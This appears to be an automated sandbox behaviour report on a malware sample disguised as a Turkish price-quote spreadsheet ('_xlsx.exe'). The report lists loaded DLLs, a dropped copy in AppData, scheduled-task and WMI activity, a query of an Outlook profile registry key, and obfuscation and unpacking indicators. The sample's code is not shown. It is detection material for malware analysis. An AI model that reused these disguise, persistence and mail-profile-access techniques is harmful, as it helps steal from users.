Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe	Section loaded: rtutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\OnCgVRIhY.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\OnCgVRIhY.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\OnCgVRIhY.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\OnCgVRIhY.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\OnCgVRIhY.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\OnCgVRIhY.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\OnCgVRIhY.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\OnCgVRIhY.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\OnCgVRIhY.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\OnCgVRIhY.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\OnCgVRIhY.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\OnCgVRIhY.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\OnCgVRIhY.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\OnCgVRIhY.exe	Section loaded: dwrite.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\OnCgVRIhY.exe	Section loaded: windowscodecs.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\OnCgVRIhY.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\OnCgVRIhY.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\OnCgVRIhY.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\OnCgVRIhY.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\OnCgVRIhY.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\OnCgVRIhY.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\OnCgVRIhY.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\OnCgVRIhY.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\OnCgVRIhY.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\OnCgVRIhY.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\OnCgVRIhY.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\OnCgVRIhY.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\OnCgVRIhY.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\OnCgVRIhY.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\OnCgVRIhY.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\OnCgVRIhY.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\OnCgVRIhY.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\OnCgVRIhY.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\OnCgVRIhY.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: fastprox.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: ncobjapi.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: mpclient.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: version.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: msasn1.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: wmitomi.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: mi.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: miutils.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: miutils.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: gpapi.dll
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: taskschd.dll
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Roaming\OnCgVRIhY.exe	Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Roaming\OnCgVRIhY.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Roaming\OnCgVRIhY.exe	Section loaded: version.dll
Source: C:\Users\user\AppData\Roaming\OnCgVRIhY.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Roaming\OnCgVRIhY.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Roaming\OnCgVRIhY.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Roaming\OnCgVRIhY.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Roaming\OnCgVRIhY.exe	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Roaming\OnCgVRIhY.exe	Section loaded: profapi.dll
Source: C:\Users\user\AppData\Roaming\OnCgVRIhY.exe	Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Roaming\OnCgVRIhY.exe	Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Roaming\OnCgVRIhY.exe	Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Roaming\OnCgVRIhY.exe	Section loaded: rasapi32.dll
Source: C:\Users\user\AppData\Roaming\OnCgVRIhY.exe	Section loaded: rasman.dll
Source: C:\Users\user\AppData\Roaming\OnCgVRIhY.exe	Section loaded: rtutils.dll
Source: C:\Users\user\AppData\Roaming\OnCgVRIhY.exe	Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Roaming\OnCgVRIhY.exe	Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Roaming\OnCgVRIhY.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Roaming\OnCgVRIhY.exe	Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Roaming\OnCgVRIhY.exe	Section loaded: dhcpcsvc6.dll
Source: C:\Users\user\AppData\Roaming\OnCgVRIhY.exe	Section loaded: dhcpcsvc.dll
Source: C:\Users\user\AppData\Roaming\OnCgVRIhY.exe	Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Roaming\OnCgVRIhY.exe	Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Roaming\OnCgVRIhY.exe	Section loaded: rasadhlp.dll
Source: C:\Users\user\AppData\Roaming\OnCgVRIhY.exe	Section loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\Roaming\OnCgVRIhY.exe	Section loaded: secur32.dll
Source: C:\Users\user\AppData\Roaming\OnCgVRIhY.exe	Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Roaming\OnCgVRIhY.exe	Section loaded: schannel.dll
Source: C:\Users\user\AppData\Roaming\OnCgVRIhY.exe	Section loaded: mskeyprotect.dll
Source: C:\Users\user\AppData\Roaming\OnCgVRIhY.exe	Section loaded: ntasn1.dll
Source: C:\Users\user\AppData\Roaming\OnCgVRIhY.exe	Section loaded: ncrypt.dll
Source: C:\Users\user\AppData\Roaming\OnCgVRIhY.exe	Section loaded: ncryptsslp.dll
Source: C:\Users\user\AppData\Roaming\OnCgVRIhY.exe	Section loaded: msasn1.dll
Source: C:\Users\user\AppData\Roaming\OnCgVRIhY.exe	Section loaded: gpapi.dll
Source: C:\Users\user\AppData\Roaming\OnCgVRIhY.exe	Section loaded: dpapi.dll

Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32

Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe

File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

Jump to behavior

Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676

Jump to behavior

Source: TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR

Source: TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source: TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Source:	Binary string: sZXF.pdbSHA256 source: TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe, OnCgVRIhY.exe.0.dr
Source:	Binary string: sZXF.pdb source: TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe, OnCgVRIhY.exe.0.dr

Data Obfuscation

.NET source code contains potential unpacker

Source: TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe, Form1.cs	.Net Code: InitializeComponent System.Reflection.Assembly.Load(byte[])
Source: OnCgVRIhY.exe.0.dr, Form1.cs	.Net Code: InitializeComponent System.Reflection.Assembly.Load(byte[])
Source: 0.2.TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe.29f53b8.1.raw.unpack, JK.cs	.Net Code: ve System.Reflection.Assembly.Load(byte[])
Source: 0.2.TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe.51d0000.5.raw.unpack, JK.cs	.Net Code: ve System.Reflection.Assembly.Load(byte[])
Source: 0.2.TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe.6f00000.6.raw.unpack, Q9VkWOKC4Ua0fHmFDp.cs	.Net Code: z1nhtEJ3eA System.Reflection.Assembly.Load(byte[])
Source: 0.2.TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe.29fe9d0.0.raw.unpack, JK.cs	.Net Code: ve System.Reflection.Assembly.Load(byte[])
Source: 0.2.TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe.3c785f0.2.raw.unpack, Q9VkWOKC4Ua0fHmFDp.cs	.Net Code: z1nhtEJ3eA System.Reflection.Assembly.Load(byte[])
Source: 10.2.OnCgVRIhY.exe.2d0e8fc.0.raw.unpack, JK.cs	.Net Code: ve System.Reflection.Assembly.Load(byte[])

Source: TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe

Static PE information: 0xCCC428E2 [Fri Nov 11 15:53:06 2078 UTC]

Source: C:\Users\user\AppData\Roaming\OnCgVRIhY.exe

Code function: 10_2_02B9EF83 push eax; iretd

10_2_02B9EF89

Source: TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe	Static PE information: section name: .text entropy: 7.876320634806518
Source: OnCgVRIhY.exe.0.dr	Static PE information: section name: .text entropy: 7.876320634806518

Source: 0.2.TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe.29f53b8.1.raw.unpack, JK.cs	High entropy of concatenated method names: 'JK', 'Y3', 'Lv', 'F5', 'q9', 'Ou', 'NL', 'tg', 'Jy', 'kq'
Source: 0.2.TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe.51d0000.5.raw.unpack, JK.cs	High entropy of concatenated method names: 'JK', 'Y3', 'Lv', 'F5', 'q9', 'Ou', 'NL', 'tg', 'Jy', 'kq'
Source: 0.2.TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe.6f00000.6.raw.unpack, muxAdPcj7s8dTKeU0M1.cs	High entropy of concatenated method names: 'nSndWDpqKO', 'dbEd30OVWy', 'qUldt8MPyW', 'SesdIjv56c', 'Wt6dOvqsPx', 'iCldnsGVBf', 'AdvdfPOheS', 'UF4dESwJsE', 'R99dehWAqV', 'lZVdYZ06qP'
Source: 0.2.TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe.6f00000.6.raw.unpack, jr3hpQ2ACqqIXbdsNc.cs	High entropy of concatenated method names: 'jKs4EgOelN', 'vqX4eDCoLl', 'omK4mKidVU', 'nS34cva8sp', 'EBZ4UO7YQA', 'UmB42paUSk', 'WtG4VUm1HE', 'afe4GBari5', 'd3M48P5Yoq', 'HM7499Xfe2'
Source: 0.2.TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe.6f00000.6.raw.unpack, MKXpECdQ1EKtaxsDnO.cs	High entropy of concatenated method names: 'GvpRWTEb8F', 'wlWR3Eg1tZ', 'oYnRtfdB9s', 'NshRI6IOVv', 'TxDROixtYU', 'KbCRnS12iV', 'AtXRfuOi8D', 'MHQRE7MBsb', 'oXGReqfHNi', 'G54RYD4lGA'
Source: 0.2.TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe.6f00000.6.raw.unpack, vwEmPIAIK9wQH0mvMp.cs	High entropy of concatenated method names: 'SfiLOQ6r8s', 'du5LfW5DRf', 'DZfXyXymCl', 'GavXU7CtIO', 'AZgX2gyf6J', 'bcSXQX6O6N', 'lWsXVDq5AY', 'uL7XG1ulU7', 'DSqXs0AnGP', 'pYLX88wFl8'
Source: 0.2.TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe.6f00000.6.raw.unpack, safV0hi54xbxv1r7gV.cs	High entropy of concatenated method names: 'JoDju5hUOK', 'T5yjZQLFSh', 'LJljA75qoF', 'vZCjv01jco', 'Rvsj5wVuL3', 'GrgjNKIltS', 'GtejCk2MSG', 'TuLjPE12y7', 'Ad4j6yhwLd', 'JjIjThgjMx'
Source: 0.2.TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe.6f00000.6.raw.unpack, Q9VkWOKC4Ua0fHmFDp.cs	High entropy of concatenated method names: 'NSR1Ft6BRM', 'JpE1M5GHPK', 'ysv1jPoYGI', 'r1T1Xmnh3A', 'Xgr1Leg6T8', 'jmd1HKPLIs', 'IBC1RFjwTh', 'Cq01gVmDBW', 'lnB1J20H6r', 'GO117CxStT'
Source: 0.2.TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe.6f00000.6.raw.unpack, eSH1hNhtZBn7B5GLJb.cs	High entropy of concatenated method names: 'Dispose', 'fqpb6fIfLP', 'GsswcLQbAy', 'yf0kkJkAAx', 'TXbbTux2vq', 'CpxbzldOjV', 'ProcessDialogKey', 'j0swimftTc', 'DaOwbjYT61', 'tE6wwhnLob'
Source: 0.2.TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe.6f00000.6.raw.unpack, Q9xghsc13POXL59hd36.cs	High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'u85Bu5i7xO', 'aQ3BZdntuW', 'gMCBAHdROw', 'NWvBvlaLoG', 'tLrB5wuG4r', 'TdsBNjqoSn', 'wK2BCSJGZR'
Source: 0.2.TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe.6f00000.6.raw.unpack, zn3NCY79dmYgsr4fSN.cs	High entropy of concatenated method names: 'ToqSMSZIGS', 'pQZSjTJ0kx', 'Jb2SXy7jOJ', 'duTSLAvi6C', 'rAVSHYxNFi', 'UOtSRC6voH', 'gU9SgrU4J8', 'uK4SJUDQyE', 'nCUS7KNbSZ', 'YprSxY92N0'
Source: 0.2.TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe.6f00000.6.raw.unpack, LVnkPGSGbiRthtxoiS.cs	High entropy of concatenated method names: 'irnXIZYoL9', 'dp8XnmroBs', 'XoNXEALpOm', 'qyqXeXiqKC', 'aBnXD8KkZV', 'd2FXpv33Kf', 'YKjXlMd3Ur', 'i0EXSwkDiE', 'G2kXdApiJt', 'kMeXBXF6Qn'
Source: 0.2.TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe.6f00000.6.raw.unpack, RTVPJ8XYj41c8rxLq2.cs	High entropy of concatenated method names: 'G63D8hWHGw', 'giDDopx3SQ', 'RvrDuWo39b', 'BFsDZlpW9e', 'B2FDcH77Ax', 'EdpDy49NMl', 'qClDUoXvQR', 'lp7D2fi1ny', 'SrGDQTMGOU', 'H4RDV3XSUt'
Source: 0.2.TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe.6f00000.6.raw.unpack, gIg4FK4ptc3iNx3d5t.cs	High entropy of concatenated method names: 'wRElPNnvqU', 'nXVlTo7h9R', 'CiOSiKnHce', 'oxhSbPdQ88', 'gpil9IwqTi', 'LjsloLXQ0p', 'onflrkBGq0', 'DEHlupGW9J', 'AnSlZkakXo', 'z34lAr1JSd'
Source: 0.2.TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe.6f00000.6.raw.unpack, igcy6eyM1j3LjtvZJ4.cs	High entropy of concatenated method names: 'EditValue', 'GetEditStyle', 'dJew6m5Ba2', 'wp1wT7a9Wc', 'RkpwzEwTMa', 'rkh1iChxIg', 'b351bvRT35', 'K3C1w8bsGs', 'HEb11Qoron', 'iCqwtQSsDopRtO3goQM'
Source: 0.2.TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe.6f00000.6.raw.unpack, PmlP9aQ2SI5idMhMtL.cs	High entropy of concatenated method names: 'IZQSmpfMMR', 'GaiScNwT1T', 'CYYSysn0PK', 'GaHSUjr1s5', 'FKZSutFthS', 'J3SS250VYq', 'Next', 'Next', 'Next', 'NextBytes'
Source: 0.2.TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe.6f00000.6.raw.unpack, iuk0KnTfCYRw9jb2D8.cs	High entropy of concatenated method names: 'pWRdbJCrUT', 'QmWd125csB', 'OBHdhr8aX5', 'UNrdM7wArk', 'a9cdjGm5Gp', 'MMAdLKGEMy', 'g2OdHyl2h5', 'QNPSC5RCem', 'zHTSPfh04g', 'KFgS6AYAgO'
Source: 0.2.TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe.6f00000.6.raw.unpack, RaXMABvfFfu6o5SOSX.cs	High entropy of concatenated method names: 'CqGttgN3h', 'G0uIOCG0a', 'FRknrvQ2N', 'tKtff0t4c', 'w5te3ZZfT', 'AuMYkaQXq', 'VSEyD3pMEtBHmcH8KS', 'HYycmCu58Ub9AFt5xv', 'rwbSRnjcp', 'obABqbI0S'
Source: 0.2.TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe.6f00000.6.raw.unpack, we3YK7qH5g3FHYcDWm.cs	High entropy of concatenated method names: 'ToString', 'oIBp927gdn', 'LJXpcSgOyA', 'yImpyId8KS', 'DPmpUCiFU5', 'EX1p2uCmvC', 'EYPpQJX7tM', 'PNRpVdEQjg', 'm35pGrCgRZ', 'ux6psQEZDT'
Source: 0.2.TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe.6f00000.6.raw.unpack, hqmIe8lu5adE3g7l3p.cs	High entropy of concatenated method names: 'B9jHFVF6Ol', 'ueuHj4J5PE', 'SkBHLyjcAS', 'kw8HRWMp7w', 'hsjHgHs9YU', 'wwKL5A6URS', 'ucaLNlKJhP', 'PUXLCYmvxJ', 'BOALPuOyG8', 'wYML65wlaA'
Source: 0.2.TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe.6f00000.6.raw.unpack, gWIJvlOyuCsqmNZsPS.cs	High entropy of concatenated method names: 'UrmbRKQ5sU', 'AopbgQdIA8', 'SKVb70Hurd', 'fIvbxfBe5i', 'FEfbD2yc3T', 'XMZbpwqZf7', 'Dspcn65mXoymH9kVEk', 'yMMNt9JF3SOVneNc1L', 'PWnbbVuFpB', 'obvb10b9sG'
Source: 0.2.TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe.29fe9d0.0.raw.unpack, JK.cs	High entropy of concatenated method names: 'JK', 'Y3', 'Lv', 'F5', 'q9', 'Ou', 'NL', 'tg', 'Jy', 'kq'
Source: 0.2.TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe.3c785f0.2.raw.unpack, muxAdPcj7s8dTKeU0M1.cs	High entropy of concatenated method names: 'nSndWDpqKO', 'dbEd30OVWy', 'qUldt8MPyW', 'SesdIjv56c', 'Wt6dOvqsPx', 'iCldnsGVBf', 'AdvdfPOheS', 'UF4dESwJsE', 'R99dehWAqV', 'lZVdYZ06qP'
Source: 0.2.TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe.3c785f0.2.raw.unpack, jr3hpQ2ACqqIXbdsNc.cs	High entropy of concatenated method names: 'jKs4EgOelN', 'vqX4eDCoLl', 'omK4mKidVU', 'nS34cva8sp', 'EBZ4UO7YQA', 'UmB42paUSk', 'WtG4VUm1HE', 'afe4GBari5', 'd3M48P5Yoq', 'HM7499Xfe2'
Source: 0.2.TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe.3c785f0.2.raw.unpack, MKXpECdQ1EKtaxsDnO.cs	High entropy of concatenated method names: 'GvpRWTEb8F', 'wlWR3Eg1tZ', 'oYnRtfdB9s', 'NshRI6IOVv', 'TxDROixtYU', 'KbCRnS12iV', 'AtXRfuOi8D', 'MHQRE7MBsb', 'oXGReqfHNi', 'G54RYD4lGA'
Source: 0.2.TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe.3c785f0.2.raw.unpack, vwEmPIAIK9wQH0mvMp.cs	High entropy of concatenated method names: 'SfiLOQ6r8s', 'du5LfW5DRf', 'DZfXyXymCl', 'GavXU7CtIO', 'AZgX2gyf6J', 'bcSXQX6O6N', 'lWsXVDq5AY', 'uL7XG1ulU7', 'DSqXs0AnGP', 'pYLX88wFl8'
Source: 0.2.TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe.3c785f0.2.raw.unpack, safV0hi54xbxv1r7gV.cs	High entropy of concatenated method names: 'JoDju5hUOK', 'T5yjZQLFSh', 'LJljA75qoF', 'vZCjv01jco', 'Rvsj5wVuL3', 'GrgjNKIltS', 'GtejCk2MSG', 'TuLjPE12y7', 'Ad4j6yhwLd', 'JjIjThgjMx'
Source: 0.2.TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe.3c785f0.2.raw.unpack, Q9VkWOKC4Ua0fHmFDp.cs	High entropy of concatenated method names: 'NSR1Ft6BRM', 'JpE1M5GHPK', 'ysv1jPoYGI', 'r1T1Xmnh3A', 'Xgr1Leg6T8', 'jmd1HKPLIs', 'IBC1RFjwTh', 'Cq01gVmDBW', 'lnB1J20H6r', 'GO117CxStT'
Source: 0.2.TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe.3c785f0.2.raw.unpack, eSH1hNhtZBn7B5GLJb.cs	High entropy of concatenated method names: 'Dispose', 'fqpb6fIfLP', 'GsswcLQbAy', 'yf0kkJkAAx', 'TXbbTux2vq', 'CpxbzldOjV', 'ProcessDialogKey', 'j0swimftTc', 'DaOwbjYT61', 'tE6wwhnLob'
